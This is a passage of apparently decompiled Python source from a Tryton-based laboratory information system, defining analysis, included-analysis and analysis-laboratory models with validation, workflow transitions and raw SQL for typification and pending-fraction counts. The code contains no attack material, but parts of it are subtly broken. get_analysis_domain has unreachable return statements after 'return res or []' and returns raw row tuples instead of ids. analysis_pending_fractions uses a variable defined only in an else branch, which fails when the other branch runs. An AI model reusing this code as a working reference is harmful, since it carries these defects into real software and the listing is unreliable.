depends=[\n 'behavior', 'state'])\n gender_species = fields.Text('Gender Species', translate=True, states={'invisible':Not(And(Bool(Equal(Eval('type'), 'analysis')), Bool(Equal(Eval('behavior'), 'normal')))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n microbiology = fields.Function(fields.Boolean('Microbiology'), 'on_change_with_microbiology')\n formula = fields.Many2One('lims.formula', 'Formula', states={'invisible':Not(And(Bool(Equal(Eval('type'), 'analysis')), Bool(Equal(Eval('behavior'), 'normal')))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n product = fields.Many2One('product.product', 'Product')\n automatic_acquisition = fields.Boolean('Automatic acquisition', states={'readonly': Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'state'])\n order = fields.Integer('Order', states={'invisible':Not(And(Bool(Equal(Eval('type'), 'analysis')), Eval('behavior').in_(['normal', 'internal_relation']))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n disable_as_individual = fields.Boolean('Not allowed as individual service',\n states={'invisible':Not(And(Bool(Equal(Eval('type'), 'analysis')), Eval('behavior').in_(['normal', 'internal_relation']))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n state = fields.Selection([\n ('draft', 'Draft'),\n ('active', 'Active'),\n ('disabled', 'Disabled')],\n 'State',\n required=True, readonly=True)\n planning_legend = fields.Char('Planning legend', states={'invisible':Not(And(Bool(Equal(Eval('type'), 'analysis')), Bool(Equal(Eval('behavior'), 'normal')))), \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))},\n depends=[\n 'type', 'behavior', 'state'])\n comments = fields.Text('Warnings/Comments')\n pending_fractions = fields.Function((fields.Integer('Pending fractions')), 'get_pending_fractions',\n searcher='search_pending_fractions')\n\n @classmethod\n def __setup__(cls):\n super(Analysis, cls).__setup__()\n t = cls.__table__()\n cls._sql_constraints += [\n (\n 'code_uniq', Unique(t, t.code),\n 'Analysis code must be unique')]\n cls._error_messages.update({'description_uniq':'Analysis description must be unique', \n 'not_laboratory':'Must define a Laboratory', \n 'set_laboratories':'A Set can be assigned to a single laboratory', \n 'analysis_laboratory':'The \"%(analysis)s\" analysis is not defined in laboratory \"%(laboratory)s\"', \n 'not_laboratory_change':'You can not change the laboratory because the analysis is included in a set/group with this laboratory', \n 'end_date':'The leaving date cannot be lower than entry date', \n 'end_date_wrong':'End date should not be greater than the current date'})\n cls._transitions |= set((('draft', 'active'), ('active', 'disabled')))\n cls._buttons.update({'relate_analysis':{'invisible':Eval('type') != 'set', \n 'readonly':Bool(Equal(Eval('state'), 'disabled'))}, \n 'activate':{'invisible': Eval('state') != 'draft'}, \n 'disable':{'invisible': Eval('state') != 'active'}})\n\n @staticmethod\n def default_behavior():\n return 'normal'\n\n @staticmethod\n def default_automatic_acquisition():\n return False\n\n @staticmethod\n def default_disable_as_individual():\n return False\n\n @staticmethod\n def default_state():\n return 'draft'\n\n @fields.depends('type', 'behavior')\n def on_change_with_behavior(self, name=None):\n if self.type in ('set', 'group'):\n return 'normal'\n return 
self.behavior\n\n @fields.depends('laboratories')\n def on_change_with_laboratory_domain(self, name=None):\n if self.laboratories:\n return [l.laboratory.id for l in self.laboratories if l.laboratory]\n return []\n\n @fields.depends('included_analysis')\n def on_change_with_all_included_analysis(self, name=None):\n Analysis = Pool().get('lims.analysis')\n return Analysis.get_included_analysis(self.id)\n\n @classmethod\n def view_attributes(cls):\n return [\n (\n '//page[@id=\"microbiology\"]', 'states',\n {'invisible': Not(Bool(Eval('microbiology')))}),\n (\n '//group[@id=\"button_holder\"]', 'states',\n {'invisible': Eval('type') != 'set'}),\n (\n '//page[@id=\"included_analysis\"]', 'states',\n {'invisible': Bool(Equal(Eval('type'), 'analysis'))}),\n (\n '//page[@id=\"devices\"]|//page[@id=\"methods\"]',\n 'states',\n {'invisible': Or(Eval('type').in_(['set', 'group']), Bool(Equal(Eval('behavior'), 'additional')))}),\n (\n '//page[@id=\"laboratories\"]',\n 'states',\n {'invisible': Or(Eval('type').in_(['group']), Bool(Equal(Eval('behavior'), 'additional')))})]\n\n @classmethod\n def get_included_analysis(cls, analysis_id):\n cursor = Transaction().connection.cursor()\n AnalysisIncluded = Pool().get('lims.analysis.included')\n childs = []\n cursor.execute('SELECT included_analysis FROM \"' + AnalysisIncluded._table + '\" WHERE analysis = %s', (\n analysis_id,))\n included_analysis_ids = [x[0] for x in cursor.fetchall()]\n if included_analysis_ids:\n for analysis_id in included_analysis_ids:\n if analysis_id not in childs:\n childs.append(analysis_id)\n childs.extend(cls.get_included_analysis(analysis_id))\n\n return childs\n\n @classmethod\n def get_included_analysis_analysis(cls, analysis_id):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n AnalysisIncluded = pool.get('lims.analysis.included')\n Analysis = pool.get('lims.analysis')\n childs = []\n cursor.execute('SELECT ia.included_analysis, a.type FROM \"' + AnalysisIncluded._table + '\" ia INNER JOIN \"' + Analysis._table + '\" a ON a.id = ia.included_analysis WHERE analysis = %s', (\n analysis_id,))\n included_analysis = cursor.fetchall()\n if included_analysis:\n for analysis in included_analysis:\n if analysis[1] == 'analysis':\n if analysis[0] not in childs:\n childs.append(analysis[0])\n childs.extend(cls.get_included_analysis_analysis(analysis[0]))\n\n return childs\n\n @classmethod\n def get_parents_analysis(cls, analysis_id):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n AnalysisIncluded = pool.get('lims.analysis.included')\n Analysis = pool.get('lims.analysis')\n parents = []\n cursor.execute('SELECT ia.analysis FROM \"' + AnalysisIncluded._table + '\" ia INNER JOIN \"' + Analysis._table + '\" a ON a.id = ia.analysis WHERE ia.included_analysis = %s AND a.state = \\'active\\'', (\n analysis_id,))\n parents_analysis_ids = [x[0] for x in cursor.fetchall()]\n if parents_analysis_ids:\n for analysis_id in parents_analysis_ids:\n if analysis_id not in parents:\n parents.append(analysis_id)\n parents.extend(cls.get_parents_analysis(analysis_id))\n\n return parents\n\n def get_rec_name(self, name):\n if self.code:\n return self.code + ' - ' + self.description\n return self.description\n\n @classmethod\n def search_rec_name(cls, name, clause):\n field = None\n for field in ('code', 'description'):\n records = cls.search([(field,) + tuple(clause[1:])], limit=1)\n if records:\n break\n\n if records:\n return [\n (\n field,) + tuple(clause[1:])]\n return [\n (\n cls._rec_name,) + tuple(clause[1:])]\n\n 
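# get_included_analysis/get_parents_analysis above walk the inclusion graph
# recursively through SQL. The same transitive closure on an in-memory
# adjacency map (illustrative):
def transitive_includes(graph, analysis_id):
    childs = []
    for child in graph.get(analysis_id, []):
        if child not in childs:
            childs.append(child)
            childs.extend(transitive_includes(graph, child))
    return childs

assert transitive_includes({1: [2, 3], 2: [4]}, 1) == [2, 4, 3]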
@classmethod\n def validate(cls, analysis):\n super(Analysis, cls).validate(analysis)\n for a in analysis:\n cls.check_duplicate_description(a.type, a.description)\n a.check_set()\n a.check_end_date()\n\n @classmethod\n def check_duplicate_description(cls, type, description, count=1):\n if cls.search_count([\n (\n 'description', '=', description),\n (\n 'type', '=', type),\n ('end_date', '=', None)]) > count:\n cls.raise_user_error('description_uniq')\n\n def check_set(self):\n if self.type == 'set':\n if self.laboratories:\n if len(self.laboratories) > 1:\n self.raise_user_error('set_laboratories')\n if self.included_analysis:\n if not self.laboratories:\n self.raise_user_error('not_laboratory')\n if self.included_analysis:\n set_laboratory = self.laboratories[0].laboratory\n for ia in self.included_analysis:\n included_analysis_laboratories = [lab.laboratory for lab in ia.included_analysis.laboratories]\n if set_laboratory not in included_analysis_laboratories:\n self.raise_user_error('analysis_laboratory', {'analysis':ia.included_analysis.rec_name, \n 'laboratory':set_laboratory.rec_name})\n\n def check_end_date(self):\n if self.end_date:\n if not self.start_date or self.end_date < self.start_date:\n self.raise_user_error('end_date')\n if not self.start_date or self.end_date > datetime.now().date():\n self.raise_user_error('end_date_wrong')\n\n @classmethod\n def write(cls, *args):\n actions = iter(args)\n for analysis, vals in zip(actions, actions):\n if vals.get('laboratories'):\n cls.check_laboratory_change(analysis, vals['laboratories'])\n if vals.get('description'):\n for a in analysis:\n cls.check_duplicate_description(vals.get('type', a.type), vals['description'], 0)\n\n (super(Analysis, cls).write)(*args)\n\n @classmethod\n def check_laboratory_change(cls, analysis, laboratories):\n AnalysisIncluded = Pool().get('lims.analysis.included')\n for a in analysis:\n if a.type == 'analysis':\n for operation in laboratories:\n if operation[0] == 'unlink':\n for laboratory in operation[1]:\n parent = AnalysisIncluded.search([\n (\n 'included_analysis', '=', a.id),\n (\n 'laboratory', '=', laboratory)])\n if parent:\n cls.raise_user_error('not_laboratory_change')\n\n @classmethod\n @ModelView.button_action('lims.wiz_lims_relate_analysis')\n def relate_analysis(cls, analysis):\n pass\n\n @classmethod\n @ModelView.button\n @Workflow.transition('active')\n def activate(cls, analysis):\n Date = Pool().get('ir.date')\n cls.write(analysis, {'start_date': Date.today()})\n cls.create_typification_calculated(analysis)\n cls.create_product(analysis)\n\n @classmethod\n @ModelView.button\n @Workflow.transition('disabled')\n def disable(cls, analysis):\n Date = Pool().get('ir.date')\n cls.write(analysis, {'end_date': Date.today()})\n cls.disable_typifications(analysis)\n cls.delete_included_analysis(analysis)\n cls.disable_product(analysis)\n\n @classmethod\n def create_typification_calculated(cls, analysis):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n CalculatedTypification = pool.get('lims.typification.calculated')\n for included in analysis:\n if included.type == 'analysis':\n continue\n sets_groups_ids = [\n included.id]\n sets_groups_ids.extend(Analysis.get_parents_analysis(included.id))\n for set_group_id in sets_groups_ids:\n ia = Analysis.get_included_analysis_analysis(set_group_id)\n if not ia:\n continue\n included_ids = ', '.join((str(a) for a in ia))\n cursor.execute('SELECT 
DISTINCT(product_type, matrix) FROM \"' + Typification._table + '\" WHERE valid AND analysis IN (' + included_ids + ')')\n typifications = cursor.fetchall()\n if not typifications:\n continue\n for typification in typifications:\n product_type = int(typification[0].split(',')[0][1:])\n matrix = int(typification[0].split(',')[1][:-1])\n cursor.execute('SELECT DISTINCT(analysis) FROM \"' + Typification._table + '\" WHERE product_type = %s AND matrix = %s AND valid', (\n product_type, matrix))\n typified_analysis = [a[0] for a in cursor.fetchall()]\n typified_analysis_ids = ', '.join((str(a) for a in typified_analysis))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE id IN (' + included_ids + ') AND id NOT IN (' + typified_analysis_ids + ')')\n if cursor.fetchone():\n typified = False\n else:\n typified = True\n if typified:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if not t_set_group:\n typification_create = [\n {'product_type':product_type, 'matrix':matrix, \n 'analysis':set_group_id}]\n CalculatedTypification.create(typification_create)\n else:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if t_set_group:\n CalculatedTypification.delete(t_set_group)\n\n return analysis\n\n @classmethod\n def create_product(cls, analysis):\n CreateProduct = Pool().get('lims.create_analysis_product', type='wizard')\n s_analysis, = analysis\n session_id, _, _ = CreateProduct.create()\n create_product = CreateProduct(session_id)\n with Transaction().set_context(active_id=(s_analysis.id)):\n create_product.transition_start()\n\n @classmethod\n def disable_typifications(cls, analysis):\n pool = Pool()\n Typification = pool.get('lims.typification')\n CalculatedTypification = pool.get('lims.typification.calculated')\n analysis_ids = []\n sets_groups_ids = []\n for a in analysis:\n if a.type == 'analysis':\n analysis_ids.append(a.id)\n else:\n sets_groups_ids.append(a.id)\n\n if analysis_ids:\n typifications = Typification.search([\n (\n 'analysis', 'in', analysis_ids)])\n if typifications:\n Typification.write(typifications, {'valid': False})\n if sets_groups_ids:\n typifications = CalculatedTypification.search([\n (\n 'analysis', 'in', sets_groups_ids)])\n if typifications:\n CalculatedTypification.delete(typifications)\n\n @classmethod\n def delete_included_analysis(cls, analysis):\n AnalysisIncluded = Pool().get('lims.analysis.included')\n analysis_ids = [a.id for a in analysis]\n if analysis_ids:\n included_delete = AnalysisIncluded.search([\n (\n 'included_analysis', 'in', analysis_ids)])\n if included_delete:\n AnalysisIncluded.delete(included_delete)\n\n @classmethod\n def disable_product(cls, analysis):\n pool = Pool()\n Product = pool.get('product.product')\n Template = pool.get('product.template')\n products = []\n templates = []\n for a in analysis:\n if a.product:\n products.append(a.product)\n templates.append(a.product.template)\n\n if products:\n Product.write(products, {'active': False})\n Template.write(templates, {'active': False})\n\n @fields.depends('laboratories')\n def on_change_with_microbiology(self, name=None):\n Config = Pool().get('lims.configuration')\n config_ = Config(1)\n if not config_.microbiology_laboratories:\n return False\n if self.laboratories:\n for lab in self.laboratories:\n if lab.laboratory in 
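# activate()/disable() above are Workflow transitions: they stamp start_date/
# end_date and cascade (create the product, drop typifications). The only
# allowed moves are the ones registered in __setup__ via
# cls._transitions |= set((('draft', 'active'), ('active', 'disabled'))).
# A tiny guard implementing that transition table (illustrative):
TRANSITIONS = {('draft', 'active'), ('active', 'disabled')}

def move(state, target):
    if (state, target) not in TRANSITIONS:
        raise ValueError('forbidden transition %s -> %s' % (state, target))
    return target

assert move('draft', 'active') == 'active'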
config_.microbiology_laboratories:\n return True\n\n return False\n\n @staticmethod\n def is_typified(analysis, product_type, matrix):\n pool = Pool()\n Typification = pool.get('lims.typification')\n CalculatedTypification = pool.get('lims.typification.calculated')\n if analysis.type == 'analysis':\n typified_service = Typification.search([\n (\n 'analysis', '=', analysis.id),\n (\n 'product_type', '=', product_type.id),\n (\n 'matrix', '=', matrix.id),\n ('valid', '=', True)])\n if typified_service:\n return True\n else:\n typified_service = CalculatedTypification.search([\n (\n 'analysis', '=', analysis.id),\n (\n 'product_type', '=', product_type.id),\n (\n 'matrix', '=', matrix.id)])\n if typified_service:\n return True\n return False\n\n @classmethod\n def copy(cls, analysis, default=None):\n if default is None:\n default = {}\n current_default = default.copy()\n current_default['state'] = 'draft'\n current_default['start_date'] = None\n current_default['end_date'] = None\n return super(Analysis, cls).copy(analysis, default=current_default)\n\n @classmethod\n def get_pending_fractions(cls, records, name):\n context = Transaction().context\n date_from = context.get('date_from') or None\n date_to = context.get('date_to') or None\n calculate = context.get('calculate', True)\n if not (date_from and date_to and calculate):\n return dict(((r.id, None) for r in records))\n new_context = {}\n new_context['date_from'] = date_from\n new_context['date_to'] = date_to\n with Transaction().set_context(new_context):\n return cls.analysis_pending_fractions([r.id for r in records])\n\n @classmethod\n def search_pending_fractions(cls, name, domain=None):\n context = Transaction().context\n date_from = context.get('date_from') or None\n date_to = context.get('date_to') or None\n calculate = context.get('calculate', True)\n if not (date_from and date_to and calculate):\n return []\n new_context = {}\n new_context['date_from'] = date_from\n new_context['date_to'] = date_to\n with Transaction().set_context(new_context):\n pending_fractions = iter(cls.analysis_pending_fractions().items())\n processed_lines = []\n for analysis, pending in pending_fractions:\n processed_lines.append({'analysis':analysis, \n 'pending_fractions':pending})\n\n record_ids = [line['analysis'] for line in processed_lines if cls._search_pending_fractions_eval_domain(line, domain)]\n return [('id', 'in', record_ids)]\n\n @classmethod\n def analysis_pending_fractions(cls, analysis_ids=None):\n cursor = Transaction().connection.cursor()\n context = Transaction().context\n pool = Pool()\n NotebookLine = pool.get('lims.notebook.line')\n PlanificationServiceDetail = pool.get('lims.planification.service_detail')\n PlanificationDetail = pool.get('lims.planification.detail')\n Planification = pool.get('lims.planification')\n EntryDetailAnalysis = pool.get('lims.entry.detail.analysis')\n Analysis = pool.get('lims.analysis')\n Service = pool.get('lims.service')\n Fraction = pool.get('lims.fraction')\n FractionType = pool.get('lims.fraction.type')\n date_from = context.get('date_from')\n date_to = context.get('date_to')\n preplanned_clause = ''\n cursor.execute('SELECT DISTINCT(nl.service) FROM \"' + NotebookLine._table + '\" nl INNER JOIN \"' + PlanificationServiceDetail._table + '\" psd ON psd.notebook_line = nl.id INNER JOIN \"' + PlanificationDetail._table + '\" pd ON psd.detail = pd.id INNER JOIN \"' + Planification._table + '\" p ON pd.planification = p.id WHERE p.state = \\'preplanned\\'')\n preplanned_services = [s[0] for s in 
cursor.fetchall()]\n if preplanned_services:\n preplanned_services_ids = ', '.join((str(s) for s in preplanned_services))\n preplanned_clause = 'AND service.id NOT IN (' + preplanned_services_ids + ')'\n else:\n not_planned_services_clause = ''\n cursor.execute('SELECT DISTINCT(d.service) FROM \"' + EntryDetailAnalysis._table + '\" d INNER JOIN \"' + Analysis._table + '\" a ON a.id = d.analysis WHERE d.state IN (\\'draft\\', \\'unplanned\\') AND a.behavior != \\'internal_relation\\'')\n not_planned_services = [s[0] for s in cursor.fetchall()]\n if not_planned_services:\n not_planned_services_ids = ', '.join((str(s) for s in not_planned_services))\n not_planned_services_clause = 'AND id IN (' + not_planned_services_ids + ')'\n if analysis_ids:\n all_analysis_ids = analysis_ids\n else:\n cursor.execute('SELECT id FROM \"' + cls._table + '\"')\n all_analysis_ids = [a[0] for a in cursor.fetchall()]\n res = {}\n for analysis_id in all_analysis_ids:\n count = 0\n cursor.execute('SELECT service.id FROM \"' + Service._table + '\" service INNER JOIN \"' + Fraction._table + '\" fraction ON fraction.id = service.fraction INNER JOIN \"' + FractionType._table + '\" f_type ON f_type.id = fraction.type WHERE service.analysis = %s AND confirmation_date::date >= %s::date AND confirmation_date::date <= %s::date AND fraction.confirmed = TRUE AND f_type.plannable = TRUE ' + preplanned_clause, (\n analysis_id, date_from, date_to))\n pending_services = [s[0] for s in cursor.fetchall()]\n if pending_services:\n pending_services_ids = ', '.join((str(s) for s in pending_services))\n cursor.execute('SELECT COUNT(*) FROM \"' + Service._table + '\" WHERE id IN (' + pending_services_ids + ') ' + not_planned_services_clause)\n count = cursor.fetchone()[0]\n res[analysis_id] = count\n\n return res\n\n @staticmethod\n def _search_pending_fractions_eval_domain(line, domain):\n operator_funcs = {'=':operator.eq, \n '>=':operator.ge, \n '>':operator.gt, \n '<=':operator.le, \n '<':operator.lt, \n '!=':operator.ne, \n 'in':lambda v, l: v in l, \n 'not in':lambda v, l: v not in l}\n field, op, operand = domain\n value = line.get(field)\n return operator_funcs[op](value, operand)\n\n\nclass AnalysisIncluded(ModelSQL, ModelView):\n __doc__ = 'Included Analysis'\n __name__ = 'lims.analysis.included'\n analysis = fields.Many2One('lims.analysis', 'Analysis', required=True, ondelete='CASCADE',\n select=True)\n included_analysis = fields.Many2One('lims.analysis', 'Included analysis', required=True,\n depends=['analysis_domain'],\n domain=[\n (\n 'id', 'in', Eval('analysis_domain'))])\n analysis_domain = fields.Function(fields.Many2Many('lims.analysis', None, None, 'Analysis domain'), 'on_change_with_analysis_domain')\n analysis_type = fields.Function(fields.Selection([\n ('analysis', 'Analysis'),\n ('set', 'Set'),\n ('group', 'Group')],\n 'Type',\n sort=False), 'on_change_with_analysis_type')\n laboratory = fields.Many2One('lims.laboratory', 'Laboratory', domain=[\n (\n 'id', 'in', Eval('laboratory_domain'))],\n states={'required':Or(Bool(Equal(Eval('_parent_analysis', {}).get('type'), 'set')), And(Bool(Equal(Eval('_parent_analysis', {}).get('type'), 'group')), Bool(Equal(Eval('analysis_type'), 'analysis'))), Bool(Eval('laboratory_domain'))), \n 'readonly':Bool(Equal(Eval('_parent_analysis', {}).get('type'), 'set')), \n 'invisible':Eval('analysis_type').in_(['set', 'group'])},\n depends=[\n 'laboratory_domain', 'analysis_type'])\n laboratory_domain = fields.Function(fields.Many2Many('lims.laboratory', None, None, 'Laboratory 
domain'), 'on_change_with_laboratory_domain')\n\n @classmethod\n def __setup__(cls):\n super(AnalysisIncluded, cls).__setup__()\n cls._error_messages.update({'duplicated_analysis':'The analysis \"%s\" is already included', \n 'not_set_laboratory':'No Laboratory loaded for the Set'})\n\n @classmethod\n def validate(cls, included_analysis):\n super(AnalysisIncluded, cls).validate(included_analysis)\n for analysis in included_analysis:\n analysis.check_duplicated_analysis()\n\n def check_duplicated_analysis(self):\n Analysis = Pool().get('lims.analysis')\n analysis_id = self.analysis.id\n included = self.search([\n (\n 'analysis', '=', analysis_id),\n (\n 'id', '!=', self.id)])\n if included:\n analysis_ids = []\n for ai in included:\n if ai.included_analysis:\n analysis_ids.append(ai.included_analysis.id)\n analysis_ids.extend(Analysis.get_included_analysis(ai.included_analysis.id))\n\n if self.included_analysis.id in analysis_ids:\n self.raise_user_error('duplicated_analysis', (\n self.included_analysis.rec_name,))\n\n @fields.depends('included_analysis', 'analysis', 'laboratory', '_parent_analysis.type', '_parent_analysis.laboratories')\n def on_change_included_analysis(self):\n laboratory = None\n if self.included_analysis:\n laboratories = self.on_change_with_laboratory_domain()\n if len(laboratories) == 1:\n laboratory = laboratories[0]\n self.laboratory = laboratory\n\n @fields.depends('included_analysis')\n def on_change_with_analysis_type(self, name=None):\n res = ''\n if self.included_analysis:\n res = self.included_analysis.type\n return res\n\n @staticmethod\n def default_analysis_domain():\n AnalysisIncluded = Pool().get('lims.analysis.included')\n context = Transaction().context\n analysis_id = context.get('analysis', None)\n analysis_type = context.get('type', None)\n laboratories = context.get('laboratory_domain', [])\n return AnalysisIncluded.get_analysis_domain(analysis_id, analysis_type, laboratories)\n\n @fields.depends('analysis', '_parent_analysis.type', '_parent_analysis.laboratories')\n def on_change_with_analysis_domain(self, name=None):\n analysis_id = self.analysis.id if self.analysis else None\n analysis_type = self.analysis.type if self.analysis else None\n laboratories = []\n if self.analysis:\n if self.analysis.laboratories:\n laboratories = [l.laboratory.id for l in self.analysis.laboratories]\n return self.get_analysis_domain(analysis_id, analysis_type, laboratories)\n\n @staticmethod\n def get_analysis_domain(analysis_id=None, analysis_type=None, laboratories=[]):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n AnalysisIncluded = pool.get('lims.analysis.included')\n Analysis = pool.get('lims.analysis')\n AnalysisLaboratory = pool.get('lims.analysis-laboratory')\n if not analysis_type:\n return []\n else:\n if analysis_type == 'set':\n if len(laboratories) != 1:\n AnalysisIncluded.raise_user_error('not_set_laboratory')\n else:\n set_laboratory_id = laboratories[0]\n not_parent_clause = ''\n if analysis_id:\n not_parent_clause = 'AND al.analysis != ' + str(analysis_id)\n cursor.execute('SELECT DISTINCT(al.analysis) FROM \"' + AnalysisLaboratory._table + '\" al INNER JOIN \"' + Analysis._table + '\" a ON a.id = al.analysis WHERE al.laboratory = %s AND a.state = \\'active\\' AND a.type = \\'analysis\\' AND a.end_date IS NULL ' + not_parent_clause, (\n set_laboratory_id,))\n res = cursor.fetchall()\n return res or []\n return [x[0] for x in res]\n not_parent_clause = ''\n if analysis_id:\n not_parent_clause = 'AND id != ' + str(analysis_id)\n 
cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE state = \\'active\\' AND type != \\'group\\' AND end_date IS NULL ' + not_parent_clause)\n res = cursor.fetchall()\n return res or []\n return [x[0] for x in res]\n\n @staticmethod\n def default_laboratory_domain():\n return Transaction().context.get('laboratory_domain', [])\n\n @fields.depends('included_analysis', 'analysis', '_parent_analysis.type', '_parent_analysis.laboratories', 'laboratory')\n def on_change_with_laboratory_domain(self, name=None):\n laboratories = []\n analysis_laboratories = []\n if self.included_analysis:\n if self.included_analysis.laboratories:\n analysis_laboratories = [l.laboratory.id for l in self.included_analysis.laboratories]\n elif self.analysis and self.analysis.type == 'set':\n if self.analysis.laboratories:\n set_laboratory = self.analysis.laboratories[0].laboratory.id\n if set_laboratory in analysis_laboratories:\n laboratories = [\n set_laboratory]\n else:\n laboratories = analysis_laboratories\n if not laboratories:\n if self.laboratory:\n laboratories = [\n self.laboratory.id]\n return laboratories\n\n @classmethod\n def create(cls, vlist):\n included_analysis = super(AnalysisIncluded, cls).create(vlist)\n cls.create_typification_calculated(included_analysis)\n return included_analysis\n\n @classmethod\n def create_typification_calculated(cls, included_analysis):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n CalculatedTypification = pool.get('lims.typification.calculated')\n for included in included_analysis:\n if included.analysis.state != 'active':\n continue\n sets_groups_ids = [\n included.analysis.id]\n sets_groups_ids.extend(Analysis.get_parents_analysis(included.analysis.id))\n for set_group_id in sets_groups_ids:\n ia = Analysis.get_included_analysis_analysis(set_group_id)\n if not ia:\n continue\n included_ids = ', '.join((str(a) for a in ia))\n cursor.execute('SELECT DISTINCT(product_type, matrix) FROM \"' + Typification._table + '\" WHERE valid AND analysis IN (' + included_ids + ')')\n typifications = cursor.fetchall()\n if not typifications:\n continue\n for typification in typifications:\n product_type = int(typification[0].split(',')[0][1:])\n matrix = int(typification[0].split(',')[1][:-1])\n cursor.execute('SELECT DISTINCT(analysis) FROM \"' + Typification._table + '\" WHERE product_type = %s AND matrix = %s AND valid', (\n product_type, matrix))\n typified_analysis = [a[0] for a in cursor.fetchall()]\n typified_analysis_ids = ', '.join((str(a) for a in typified_analysis))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE id IN (' + included_ids + ') AND id NOT IN (' + typified_analysis_ids + ')')\n if cursor.fetchone():\n typified = False\n else:\n typified = True\n if typified:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if not t_set_group:\n typification_create = [\n {'product_type':product_type, 'matrix':matrix, \n 'analysis':set_group_id}]\n CalculatedTypification.create(typification_create)\n else:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if t_set_group:\n CalculatedTypification.delete(t_set_group)\n\n return included_analysis\n\n @classmethod\n def delete(cls, included_analysis):\n 
cls.delete_typification_calculated(included_analysis)\n super(AnalysisIncluded, cls).delete(included_analysis)\n\n @classmethod\n def delete_typification_calculated(cls, included_analysis):\n cursor = Transaction().connection.cursor()\n pool = Pool()\n Analysis = pool.get('lims.analysis')\n Typification = pool.get('lims.typification')\n CalculatedTypification = pool.get('lims.typification.calculated')\n for included in included_analysis:\n if included.analysis.state != 'active':\n continue\n elif included.included_analysis.type == 'analysis':\n deleted_analysis = [\n included.included_analysis.id]\n else:\n deleted_analysis = Analysis.get_included_analysis_analysis(included.included_analysis.id)\n sets_groups_ids = [included.analysis.id]\n sets_groups_ids.extend(Analysis.get_parents_analysis(included.analysis.id))\n for set_group_id in sets_groups_ids:\n typified = True\n ia = Analysis.get_included_analysis_analysis(set_group_id)\n if deleted_analysis:\n for da in deleted_analysis:\n if da in ia:\n ia.remove(da)\n\n if not ia:\n continue\n included_ids = ', '.join((str(a) for a in ia))\n cursor.execute('SELECT DISTINCT(product_type, matrix) FROM \"' + Typification._table + '\" WHERE valid AND analysis IN (' + included_ids + ')')\n typifications = cursor.fetchall()\n if not typifications:\n continue\n for typification in typifications:\n product_type = int(typification[0].split(',')[0][1:])\n matrix = int(typification[0].split(',')[1][:-1])\n cursor.execute('SELECT DISTINCT(analysis) FROM \"' + Typification._table + '\" WHERE product_type = %s AND matrix = %s AND valid', (\n product_type, matrix))\n typified_analysis = [a[0] for a in cursor.fetchall()]\n typified_analysis_ids = ', '.join((str(a) for a in typified_analysis))\n cursor.execute('SELECT id FROM \"' + Analysis._table + '\" WHERE id IN (' + included_ids + ') AND id NOT IN (' + typified_analysis_ids + ')')\n if cursor.fetchone():\n typified = False\n else:\n typified = True\n if typified:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if not t_set_group:\n typification_create = [\n {'product_type':product_type, 'matrix':matrix, \n 'analysis':set_group_id}]\n CalculatedTypification.create(typification_create)\n else:\n t_set_group = CalculatedTypification.search([\n (\n 'product_type', '=', product_type),\n (\n 'matrix', '=', matrix),\n (\n 'analysis', '=', set_group_id)])\n if t_set_group:\n CalculatedTypification.delete(t_set_group)\n\n @classmethod\n def search_rec_name(cls, name, clause):\n return ['OR',\n ('included_analysis.code', ) + tuple(clause[1:]),\n ('included_analysis.description', ) + tuple(clause[1:])]\n\n\nclass AnalysisLaboratory(ModelSQL, ModelView):\n __doc__ = 'Analysis - Laboratory'\n __name__ = 'lims.analysis-laboratory'\n analysis = fields.Many2One('lims.analysis', 'Analysis', ondelete='CASCADE',\n select=True,\n required=True)\n laboratory = fields.Many2One('lims.laboratory', 'Laboratory', ondelete='CASCADE',\n select=True,\n required=True)\n department = fields.Many2One('company.department', 'Department', states={'readonly': ~Equal(Eval('context', {}).get('type', ''), 'analysis')})\n\n\nclass AnalysisLabMethod(ModelSQL):\n __doc__ = 'Analysis - Laboratory Method'\n __name__ = 'lims.analysis-lab.method'\n analysis = fields.Many2One('lims.analysis', 'Analysis', ondelete='CASCADE',\n select=True,\n required=True)\n method = fields.Many2One('lims.lab.method', 'Method', ondelete='CASCADE',\n 
